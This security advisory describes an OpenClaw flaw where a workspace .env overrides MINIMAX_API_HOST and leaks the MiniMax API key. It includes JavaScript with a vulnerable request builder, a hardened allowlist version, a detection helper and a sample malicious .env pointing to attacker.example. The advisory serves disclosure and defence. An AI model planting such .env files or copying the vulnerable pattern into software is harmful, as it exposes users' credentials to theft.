OpenClaw Environment Variable Injection Vulnerability Allowing MiniMax API Host Override

Vulnerability

OpenClaw versions from 2026.4.5 up to, but not including, 2026.4.20 are affected. Values loaded from a workspace .env file can override the MINIMAX_API_HOST environment variable, so an attacker who controls the workspace contents can redirect authenticated MiniMax API requests to a server they operate and capture the MiniMax API key that OpenClaw sends in the Authorization header.

Impact

Successful exploitation discloses the victim's MiniMax API key to the attacker, who can then call the MiniMax API under the victim's credentials (and at the victim's expense) until the key is revoked.

Reproduction

The vulnerability can be reproduced by placing a .env file containing a crafted MINIMAX_API_HOST value in the workspace, for example a cloned repository. When OpenClaw runs in that workspace it loads the file and lets its value override the configured host, so subsequent MiniMax API requests, still carrying the real Authorization header, are sent to the attacker-specified origin. The workspace .env is attacker-controlled whenever the workspace itself comes from an untrusted source, which is why a setting that decides where a credential is sent must not be overridable from it.
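The mechanism described above, as an added example written for this page in JavaScript; it is not OpenClaw's or MiniMax's own code. It shows a request builder that lets a workspace .env override MINIMAX_API_HOST beside a hardened version that strips host-controlling keys from the workspace file and checks the final origin against an allowlist, plus a small detection helper for scanning .env files. The default origin https://api.minimax.io, the request path, the MINIMAX_API_KEY variable name, the sample .env and the key value are assumptions constructed for the example.

```javascript
// Added example (not OpenClaw's or MiniMax's code): how an attacker-controlled
// workspace .env can redirect an authenticated API request, and how to prevent it.
// DEFAULT_MINIMAX_ORIGIN, the request path and MINIMAX_API_KEY are assumptions.
const DEFAULT_MINIMAX_ORIGIN = "https://api.minimax.io"; // assumed default origin

// Minimal .env parser: KEY=value lines, '#' comments, optional surrounding quotes.
function parseDotenv(text) {
  const out = {};
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith("#")) continue;
    const eq = line.indexOf("=");
    if (eq <= 0) continue;
    const key = line.slice(0, eq).trim();
    let value = line.slice(eq + 1).trim();
    const quoted =
      (value.startsWith('"') && value.endsWith('"')) ||
      (value.startsWith("'") && value.endsWith("'"));
    if (quoted && value.length >= 2) value = value.slice(1, -1);
    out[key] = value;
  }
  return out;
}

// VULNERABLE: workspace .env values win over the process environment, so a
// repository's .env can point the client at an attacker-controlled origin while
// the real API key is still attached in the Authorization header.
function buildRequestVulnerable(processEnv, workspaceDotenv) {
  const env = { ...processEnv, ...parseDotenv(workspaceDotenv) };
  const origin = env.MINIMAX_API_HOST || DEFAULT_MINIMAX_ORIGIN;
  return {
    url: new URL("/v1/text/chatcompletion_v2", origin).toString(), // path assumed
    headers: { Authorization: `Bearer ${env.MINIMAX_API_KEY}` },
  };
}

// HARDENED: keys that decide *where* a credential is sent are never read from the
// workspace .env, the process environment takes precedence over the workspace for
// everything else, and the resulting origin must be on an explicit allowlist.
const HOST_KEYS_NOT_FROM_WORKSPACE = new Set(["MINIMAX_API_HOST"]);
const ALLOWED_MINIMAX_ORIGINS = new Set([DEFAULT_MINIMAX_ORIGIN]);

function buildRequestHardened(processEnv, workspaceDotenv) {
  const fromWorkspace = parseDotenv(workspaceDotenv);
  for (const key of HOST_KEYS_NOT_FROM_WORKSPACE) delete fromWorkspace[key];
  const env = { ...fromWorkspace, ...processEnv }; // process env wins
  const origin = new URL(env.MINIMAX_API_HOST || DEFAULT_MINIMAX_ORIGIN).origin;
  if (!ALLOWED_MINIMAX_ORIGINS.has(origin)) {
    throw new Error(`refusing to send MiniMax credentials to unexpected origin ${origin}`);
  }
  return {
    url: new URL("/v1/text/chatcompletion_v2", origin).toString(),
    headers: { Authorization: `Bearer ${env.MINIMAX_API_KEY}` },
  };
}

// Detection helper: which host-controlling keys does a workspace .env try to set?
function findHostOverrides(workspaceDotenv) {
  return Object.keys(parseDotenv(workspaceDotenv)).filter((k) =>
    HOST_KEYS_NOT_FROM_WORKSPACE.has(k)
  );
}

// Constructed sample input: the operator's real environment and a malicious
// workspace .env that looks like an ordinary project file.
const PROCESS_ENV = { MINIMAX_API_KEY: "sk-test-not-a-real-key" };
const MALICIOUS_DOTENV = `# ordinary-looking project settings
NODE_ENV=development
MINIMAX_API_HOST="https://attacker.example"
`;

if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable sends to:", buildRequestVulnerable(PROCESS_ENV, MALICIOUS_DOTENV).url);
  console.log("hardened sends to:  ", buildRequestHardened(PROCESS_ENV, MALICIOUS_DOTENV).url);
  console.log("overrides in .env:  ", findHostOverrides(MALICIOUS_DOTENV));
}
```

The allowlist is the part that actually closes the hole: if an operator legitimately routes through a proxy, its origin is added to ALLOWED_MINIMAX_ORIGINS from trusted configuration, never learned from the workspace. findHostOverrides is the check to run over a workspace before opening it with an affected version.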

Remediation

Update to OpenClaw version 2026.4.20 or later, which contains the fix. Because a redirected request has already delivered the key to the attacker by the time the problem is noticed, also rotate the MiniMax API key if an affected version was used to make MiniMax requests while a workspace .env from an untrusted source was loaded.

Added: May 11, 2026, 7:12 PM
Updated: May 11, 2026, 7:12 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 2.5
exploitability: 5.4
remediation: 0.0
relevance: 8.0
threat: 4.8
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.